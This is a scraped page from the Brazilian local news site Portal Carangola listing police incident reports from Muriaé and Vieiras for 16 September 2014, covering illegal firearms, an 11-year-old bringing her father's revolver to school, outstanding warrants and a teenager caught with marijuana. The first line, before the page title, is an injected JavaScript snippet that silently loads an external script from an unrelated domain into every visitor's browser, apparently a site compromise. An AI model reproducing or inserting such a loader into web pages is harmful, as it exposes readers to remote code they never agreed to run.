;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 17/09/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 17/09/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE  MURIAÉ – 17/09/2014

                        76ª CIA PM – MURIAÉ-MG

 PM EFETUA PRISÃO E APREENSÃO DE MENOR POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ 

Em 16/09/2014, por volta das 09h20min, na Rua Sargento Joaquim Azevedo, no Bairro Planalto, após informações de que F.A.B., de 33 anos, estava portando uma arma de fogo com intenção de matar uma pessoa, militares deslocaram ao local e avistaram o veículo GM VECTRA, cor branca, conduzido por A.D.A., de 36anos, tendo como carona o primeiro, sendo localizado na cintura do denunciado um revólver cal .38, com 05 cartuchos intactos. O indivíduo citado relatou que J.B.V., de 50 anos e seu neto F.V.S., de 13 anos, entraram em sua residência, e que um deles portava uma garrucha cromada, dizendo, “eu vim resolver este problema agora se tiver que matar a gente mata mesmo”, então o ameaçado foi ao seu quarto e pegou seu revólver, momento em que o invasor evadiu, em um veículo CHEVETTE. Em rastreamento este e seu neto foram localizados em frente sua residência e negou ter ameaçado o autor o cidadão. Realizada vistoria na residência e veículo do autor J.B., porém nada foi localizado. O veículo GM VECTRA, que foi utilizado na tentativa de fuga do autor, foi apreendido e encaminhado ao pátio DETRAN. Diante o exposto, foi dada voz de prisão este pelo crime de ameaça, voz de apreensão ao menor, voz de prisão ao autor que portava a arma pelo crime de porte ilegal de arma e ao terceiro por co autoria.

PM EFETUA PRISÃO DE PAI DE MENOR QUE ESTAVA PORTANDO ARMA DE FOGO EM MURIAÉ 

Em 16/09/2014, por volta das 09h40min, na Rua Tomas Antônio Gonzaga, no Bairro inconfidência, após denúncia de que uma aluna de nome A.B.A.S. da ESCOLA MUNICIPAL PROFESSORA ESMERALDA VIANNA, residente na zona rural, estava portando uma arma de fogo dentro da mochila, estando no interior da escola, militares deslocaram ao local onde com anuência da diretora H.H.A.R., foi vistoriada a mochila da aluna de 11 anos, sendo encontrado um revólver cal .32, com três munições que foram apreendidas. A aluna disse que a arma pertence a seu pai M.B.S., de 38 anos. E que alguns colegas de sala vivem implicando com ela, então resolveu levar a arma para apenas dar um susto nos colegas. Em contato com seu pai, este relatou ser o possuidor da referida arma de fogo, e que não possui porte nem o registro da arma, e que teria adquirido de um irmão como forma de pagamento de uma dívida. O pai da menor foi encaminhado à DPJ para melhores esclarecimentos.

PM LOCALIZA FORAGIDO DA JUSTIÇA DURANTE OPERAÇÃO E EFETUA PRISÃO EM MURIAÉ 

Em 16/09/2014, por volta das 18h10min, na Rua Capitão Felisberto, no Bairro Barra, durante operação GUARDIÃO, militares abordaram R.D.S., de 26 anos, não sendo encontrado nada de ilícito, porém, ao efetuar consulta no sistema informatizado, constou que havia um mandado de prisão em aberto contra o mesmo. Foi dada voz de prisão a ele e conduzido à DPJ.

PM CUMPRE MANDADO DE PRISÃO DURANTE OPERAÇÃO EM MURIAÉ 

Em 16/09/2014, por volta das 19h30min, na Rua José de Abreu, no Bairro Safira, durante operação GUARDIÃO, militares abordaram L.R., de 29 anos, não sendo encontrado nada de ilícito, porém, ao efetuar consulta no sistema informatizado, constou que havia um mandado de prisão em aberto contra o mesmo. Foi dada voz de prisão ao indivíduo e conduzido à DPJ.

PM CUMPRE MANDADO DE PRISÃO EM MURIAÉ EM OPERAÇÃO GUARDIÃO 

Em 16/09/2014, por volta das 20h, na Rua Lica muglia, no Bairro Aeroporto, durante operação GUARDIÃO, militares abordaram W.P., de 31 anos e este não possuía documento de identificação e repassou o nome W.P. aos policiais, momento em que foi advertido e informou seu verdadeiro nome, sendo constatado em desfavor do mesmo um mandado de prisão. Foi dada voz de prisão ao autor e conduzido à DPJ.

PM CUMPRE MAIS UM MANDADO DE APREENSÃO DE MENOR DURANTE OPERAÇÃO EM MURIAÉ 

Em 16/09/2014, por volta das 20h30min, na Rua Educação, no Bairro São Joaquim, durante operação GUARDIÃO, militares abordaram R.M.L.C., de 17 anos, não sendo encontrado nada de ilícito, porém, ao efetuar consulta no sistema informatizado, constou que havia um mandado de apreensão em desfavor do mesmo. Foi dada voz de apreensão ao menor e conduzido à DPJ.

PM APREENDE MENOR POR TRÁFICO DE DROGAS EM MURIAÉ

 Em 16/09/2014, por volta das 22h40min, na Rua Elias Paulo, no Bairro Barra, durante operação GUARDIÃO DA DIVISA, militares, em patrulhamento pelo local conhecido como ponto de venda de drogas, depararam com o Y.S.S.N., de 15 anos, o qual, ao avistar a VP, virou-se rapidamente e dispensou um pote de plástico, sendo abordado e encontrado em seu poder R$122, 65 e um celular LG de cor branca, com várias fotos de armas e maconha cortada em diversos tabletes. No pote que o autor havia dispensado, foi localizado 09 invólucros plásticos contendo maconha. Ante ao exposto, foi dada voz de apreensão ao menor e conduzido à DPJ.

PM EFETUA PRISÃO POR PORTE ILEGAL DE ARMA DE FOGO EM VIEIRAS 

Em 16/09/2014, por volta das 21h30min, na Estrada Santo Antônio do Glória, na zona rural de Vieiras, em contato com a vítima G.G.C., de 14 anos, esta relatou que possuía um relacionamento amoroso com F.P.P., de 18 anos, e que juntos tiveram uma filha. Que nesta data ele pegou a referida criança e, no momento de devolvê-la, tiveram uma discussão, sendo que ele sacou de uma arma de fogo para ameaçar a companheira e os seus familiares, sendo impedido por terceiros que tomaram a arma do autor. Que posteriormente a arma foi entregue a E.J.P., de 50 anos, genitor do autor. Em rastreamento, este foi localizado e, após muita argumentação, informou que a arma estava escondida dentro de um veículo FIAT UNO, sendo encontrado 01 GARRUCHA oxidada, desmuniciada, no porta luvas. Diante dos fatos, foi dada voz de prisão ao autor e conduzido à DPJ. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.